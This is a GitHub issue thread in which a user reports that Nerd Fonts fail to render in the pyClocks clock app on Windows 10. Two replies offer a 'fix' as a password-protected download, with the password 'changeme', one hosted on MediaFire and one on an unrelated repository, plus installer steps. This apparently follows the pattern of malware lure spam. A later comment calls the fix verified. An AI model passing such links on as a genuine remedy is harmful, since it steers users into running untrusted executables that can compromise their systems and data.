### ISSUE TITLE
nerdfonts may not be displayed correctly

### ISSUE THREAD

**Issue by milessic** [milessic/pyClocks#4]
User reports that nerfdont is not loaded properly

![image](https://github.com/user-attachments/assets/54963503-241b-4dcf-9df0-455f4f845463)

![image](https://github.com/user-attachments/assets/17e31d82-2dd7-489f-b0ca-dfb1b9018b76)

__env:__ windows10

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by milessic** [comment]
![image](https://github.com/user-attachments/assets/9529f832-c392-4491-bc89-70625a65d610)
User confirms that fix is verified :D
